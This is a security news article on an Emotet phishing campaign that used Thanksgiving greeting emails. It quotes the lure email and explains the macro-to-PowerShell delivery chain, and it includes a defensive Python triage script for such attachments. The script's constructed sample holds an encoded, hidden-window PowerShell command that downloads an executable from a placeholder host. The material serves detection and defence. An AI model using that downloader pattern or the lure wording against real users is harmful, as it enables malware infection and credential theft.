Thanksgiving Phishing Scam Delivers the Emotet Malware

The Emotet malware is back in active campaigns, security researchers warn. The malware hides in documents attached to spam messages that either pretend to come from financial institutions or pose as Thanksgiving greetings sent to employees.



The last time we wrote about Emotet was a year ago, in November 2017, when the banking Trojan was updated to include a dangerous component which caused serious concerns among the security community – extracting data even over secured connections.


The malicious files are distributed through the most common infection channel, email spam. The newly reported attacks once again prove that Emotet remains one of the most widely distributed payloads and that its operators are constantly looking for new infection methods.

Emotet New Phishing Functionality

Emotet became active again at the end of October this year, when a new module was detected that exfiltrates email subjects and the first 16KB of email bodies from infected hosts. The harvested messages are believed to be used to build more convincing phishing templates.

The Thanksgiving Phishing Scam

Forcepoint researchers detected a thoughtfully crafted email which included “some cheerful Thanksgiving words”. As reported, this email was seen in volumes exceeding 27,000 messages between 07:30 EST and 17:00 EST on a single day. This is what the email body says:

Hi,

In this season of thankfulness, we are especially grateful to you, who have worked so hard to build and create the success of our company. Wishing you and your family a Thanksgiving full of blessings.

Thanksgiving Day Card below.

The attachment was in fact an XML file pretending to be a .doc file. As expected, it carried embedded macros leading to a PowerShell downloader for the Emotet payload. However, the researchers note that:

the document in this case is not the usual .doc or .docx but rather an XML file masquerading as a .doc, and the macro in this instance makes use of the Shapes feature, ultimately leading to the calling of the shell function using a WindowStyle of vbHide. The syntax for the shell function is Shell( pathname, [ windowstyle ] ) where pathname can be a program or script.


The resulting output is a heavily obfuscated command. Once deobfuscated, the command revealed the standard PowerShell downloader routinely observed in Emotet campaigns, the researchers added.
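The delivery chain described above (an XML document masquerading as .doc, a macro that launches a hidden shell, and an encoded PowerShell downloader) lends itself to a small triage script. The following is an added example written for this article; it is not code from the original page or from Forcepoint. It assumes, since the page does not say so, that the lure is a Word 2003 XML (WordprocessingML) file in which a VBA project is signalled by the w:macrosPresent="yes" attribute and stored base64-encoded inside a w:binData element named editdata.mso, and that the downloader is launched with PowerShell's -EncodedCommand (or its -e shorthand), which carries base64 of UTF-16LE text. The sample document and command line embedded below are constructed for the example, not captured from the campaign.

```python
"""Triage helpers for the Emotet delivery chain described above.

Added example: this is not code from the original article or from
Forcepoint. Assumptions not stated on the page (marked as such):
  * the lure is a Word 2003 XML (WordprocessingML) document, where a VBA
    project is signalled by w:macrosPresent="yes" on the root element and
    stored base64-encoded in <w:binData w:name="editdata.mso">;
  * the downloader is launched as an encoded PowerShell command line
    (-EncodedCommand / -e, base64 of UTF-16LE text);
  * the sample document and command line below are constructed, not
    captured from the campaign.
"""
import base64
import re
import xml.etree.ElementTree as ET
from typing import Optional

WORDML_NS = "http://schemas.microsoft.com/office/word/2003/wordml"
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# powershell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...)
ENC_FLAG = re.compile(r"(?<!\S)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)
HIDDEN_WINDOW = re.compile(r"(?<!\S)-w(?:indowstyle)?\s+hidden", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def sniff_office_file(name: str, data: bytes) -> dict:
    """Classify by magic bytes, not by extension; flag a .doc that is not OLE2."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if data.startswith(OLE2_MAGIC):
        kind = "ole2"       # legacy binary .doc
    elif data.startswith(b"PK\x03\x04"):
        kind = "ooxml"      # .docx is a zip container
    elif data.lstrip().startswith(b"<?xml") and WORDML_NS.encode() in data[:4096]:
        kind = "wordml"     # Word 2003 XML, still opened by Word under a .doc name
    else:
        kind = "unknown"
    return {"ext": ext, "kind": kind, "extension_mismatch": ext == "doc" and kind != "ole2"}


def extract_wordml_macros(data: bytes) -> dict:
    """Read the macro flag and pull every base64 binData blob out of a WordML file."""
    root = ET.fromstring(data)
    macros_present = root.get(f"{{{WORDML_NS}}}macrosPresent") == "yes"
    blobs = {}
    for el in root.iter(f"{{{WORDML_NS}}}binData"):
        blob_name = el.get(f"{{{WORDML_NS}}}name", "")
        blobs[blob_name] = base64.b64decode("".join((el.text or "").split()))
    return {"macros_present": macros_present, "bin_data": blobs}


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def triage(name: str, data: bytes, cmdline: str) -> dict:
    """Combine the attachment check with the child process command line."""
    report = sniff_office_file(name, data)
    if report["kind"] == "wordml":
        report.update(extract_wordml_macros(data))
    decoded = decode_encoded_powershell(cmdline)
    report["decoded_command"] = decoded
    report["hidden_window"] = bool(HIDDEN_WINDOW.search(cmdline))  # Shell(..., vbHide) analogue
    report["urls"] = URL_RE.findall(decoded) if decoded else []
    return report


# --- constructed sample input (not from the real campaign) ---------------------
SAMPLE_WORDML = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<?mso-application progid="Word.Document"?>
<w:wordDocument xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml"
 w:macrosPresent="yes">
 <w:binData w:name="editdata.mso">QWN0aXZlTWltZSBwbGFjZWhvbGRlcg==</w:binData>
 <w:body><w:p><w:r><w:t>Thanksgiving Day Card below.</w:t></w:r></w:p></w:body>
</w:wordDocument>
"""
# Plaintext stage in the shape of the usual Emotet downloader (constructed).
SAMPLE_STAGE = ("$u='http://example.invalid/dl/'.Split('@');"
                "foreach($x in $u){try{(New-Object Net.WebClient)"
                ".DownloadFile($x,$env:temp+'\\1.exe');break}catch{}}")
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -e "
                  + base64.b64encode(SAMPLE_STAGE.encode("utf-16-le")).decode())

if __name__ == "__main__":
    for k, v in triage("Thanksgiving_card.doc", SAMPLE_WORDML, SAMPLE_CMDLINE).items():
        print(f"{k}: {v}")
```

The point of the first check is that a .doc which does not start with the OLE2 signature should be treated as suspicious on its own, regardless of whether the macro flag is set; the decoded command line then gives you the download URLs and the hidden-window switch that corresponds to the macro's vbHide, both of which are the indicators worth blocking or hunting for.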

Milena Dimitrova